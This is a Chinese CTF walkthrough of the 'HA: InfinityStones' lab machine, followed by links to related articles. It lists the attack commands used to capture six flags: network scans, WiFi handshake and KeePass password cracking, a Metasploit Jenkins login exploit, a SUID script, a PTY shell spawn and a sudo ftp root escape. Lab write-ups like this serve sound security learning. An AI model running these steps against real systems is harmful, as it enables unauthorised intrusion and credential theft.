文章目录

  • 靶机信息
  • 一、信息收集
    • 1.主机发现
    • 2.端口扫描
    • 3.目录扫描
  • 二、漏洞挖掘
    • 1.访问 192.168.1.108
    • 2.访问 /img 目录
    • 3.访问 https 服务(443)端口
    • 4.查看 /wifi/ 路径
    • 5.访问 /aether.php 页面
    • 6.访问 8080 端口
    • 7.ssh 登陆 morag 账户

靶机信息

灭霸认为,如果他杀死了宇宙中所有生命的一半,将恢复平衡。
为此,他需要所有六块无限宝石来驱动无限手套,这反过来又使他能够弯曲时间,空间,能量以及物理和现实定律。
但是这次复仇者联盟比灭霸领先一步。
复仇者联盟在这个CTF中隐藏了所有无限宝石。
帮助灭霸获得所有无限宝石并恢复宇宙的平衡。该机器包含6种带有6种不同标志的无限宝石来测试您的技能,找出它们。

简单来说就是有6个flag,拿到它

一、信息收集

1.主机发现
arp-scan -l

2.端口扫描
nmap -A -p- 192.168.1.108


发现开放了 22 ssh 服务;80 apache;443 ssl;8080 jetty 框架

3.目录扫描
dirb http://192.168.1.108


发现三个目录

二、漏洞挖掘

1.访问 192.168.1.108


访问主页发现宝石图片切换及靶机信息和复联任务图片

2.访问 /img 目录


将图片保存到电脑,查看信息

exiftool space.jpg


得到 SPACESTONE

SPACESTONE:{74E57403424607145B9B77809DEB49D0}
3.访问 https 服务(443)端口
https://192.168.1.108/

查看证书
查看更多信息

得到 MINDSTONE

MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
4.查看 /wifi/ 路径


发现两个文件,下载文件并查看
发现流量文件是 wifi 数据包,
发现 pwd.txt 文件是密码构成:

gam 开头
一个大写字母
2个数字
2个小写字母
复联第一次上映年份(这里影院写成了威胁)

1)生成字典

crunch 12 12 -t gam,%%@@2012 -o dict.txt

2)查找 wifi-key

aircrack-ng -w ./dict.txt /root/Downloads/reality.cap


发现密码是 gamA00fe2012
3)访问 http://192.168.1.108/gamA00fe2012/
得到 REALITYSTONE

REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
5.访问 /aether.php 页面



发现 8 个问题,正确解答并转为二进制得到 01101001
1)访问 /01101001/ 路径

http://192.168.1.108/01101001/


发现 hints.txt,查看发现是 Brainfuck 编码
在 https://www.splitbrain.org/services/ook 解码得到 admin:avengers

6.访问 8080 端口


发现 jenkins 框架
1)使用 msfconsole 对其进行渗透

msfconsole
search jenkins
use 11

set target 1    #设置目标系统类型
show payloads    #查看可用payload
set payload 14    #选择对应payload
set rhosts 192.168.1.108    #设置靶机ip
set rport 8080    #设置端口
set  targeturi /    #设置路径
set username admin    #设置用户名
set password avengers    #设置密码
run    #开始利用



得到 meterpreter shell
2)get 新 shell

shell

3)尝试 suid 提权

find / -perm -u=s -type f 2>/dev/null

发现 /opt/script 文件
4)使用 python3 get 交互 shell,查看所有用户,执行 script

python3 -c "import pty;pty.spawn('/bin/bash')"
/opt/script



发现 morag、stones 账户
得到 TIMESTONE

TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}

5)查看 /opt/ 目录下所有文件

cd /opt
ls


发现 morag.kdbx 文件
6)使用 meterpreter shell 获取文件

meterpreter > download /opt/mor*



7)执行 morag.kdbx

apt-get install keepassx    #安装keepassx
keepassx ./morag.kdbx


执行发现需要密码

8)破解密码

keepass2john morag.kdbx > morag.hash
john morag.hash


得到密码 princesa,输入


打开后发现有 flag 字样,双击右边的 power stone 查看其值

得到 POWERSTONE

POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}

打开 creds 列,发现疑似 base64 代码,尝试解密

echo 'bW9yYWc6eW9uZHU=' | base64 -d


发现是 morag 账户的密码

7.ssh 登陆 morag 账户

因为我们已知靶机开放了 ssh 所以我们直接登陆即可

ssh morag@192.168.1.108
yondu


接着常规操作 sudo 提权

sudo -l
sudo ftp
!/bin/bash    # !表示在ftp中执行系统命令并返回
cd /root
cat f*



得到 SOULSTONE

SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}

至此,六个 flag 全部集齐

HA: InfinityStones靶机渗透测试相关推荐

  1. HA: Forensics靶机渗透测试

    文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...

  2. HA: Dhanush靶机渗透测试

    文章目录 一.信息收集 1.主机发现 2.端口扫描 3.查看 web 服务 二.漏洞挖掘 1.使用 cewl 生成字典 2.使用 hydra 进行爆破 3.ssh 连接 4.尝试 sudo 提权 靶机 ...

  3. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  4. DC-2靶机渗透测试流程

    目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. ​四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...

  5. 靶机渗透测试(covfefe)

    靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...

  6. 靶机渗透测试(Tre: 1)

    靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate) ...

  7. CH4INRULZ靶机渗透测试

    CH4INRULZ靶机渗透测试 环境 工具 流程 环境 kali攻击机 192.168.1.105 靶机 192.168.1.103 工具 hackbar,netdiscover,nmap,searc ...

  8. DC-3靶机渗透测试

    DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...

  9. 靶机渗透测试(unknowndevice64: 1)

    靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...

最新文章

  1. Android 线程死锁的案例
  2. 快手在直播间里养起了AI宠物,连柳岩、大鹏都爱不释手
  3. Hadoop权威指南阅读笔记
  4. 解析程序员的几个成长阶段
  5. oracle if-else sql 语句
  6. 最大流,最小费用最大流:解析 + 各种板子
  7. ros(7)自定义service数据
  8. 怎样成为一名更优秀的程序员?我总结出 7 条建议,希望对你们有帮助!
  9. 定点数和浮点数_Simulink模型中定点数的介绍
  10. c#后的完整cookie
  11. android 恢复出厂设置不清除的分区,Android如何在恢复出厂设置时不删除掉/data/media/0/里面指定的目录...
  12. npm install报错问题解决以及人人开源前端报错问题解决
  13. JavaSE第八章 IO流
  14. 如何按比例裁剪图片?怎样改变图片形状?
  15. PHP之——官方手册下载地址
  16. 教程二:windows api(c mfc vs2017)实现U盘插拔检测,获取U盘容量,U盘内容移动,开启和关闭U盘以及获取盘符等
  17. 必看!前辈们总结出的程序员找工作遇到的坑
  18. springCloud——ribbon和zuul
  19. pytorch学习之线性拟合
  20. 数据库系统概论-005: 数据库完整性(正确性和相容性)

热门文章

  1. ssh(Struts+spring+Hibernate)三大框架整合-简述
  2. Go 学习笔记(80)— Go 标准库 container/list(单链表、双链表)
  3. 数据结构(06)— 线性循环链表实战
  4. 2019年终总结:好好爱自己
  5. web服务器tornada,flask问题
  6. 通俗理解tf.nn.conv2d() tf.nn.conv3d( )参数的含义 pytorhc 卷积
  7. 深入理解 Embedding层的本质
  8. 面试高频——JUC并发工具包快速上手(超详细总结)
  9. 云计算灾备原理与预防恢复方案
  10. 什么是GStreamer?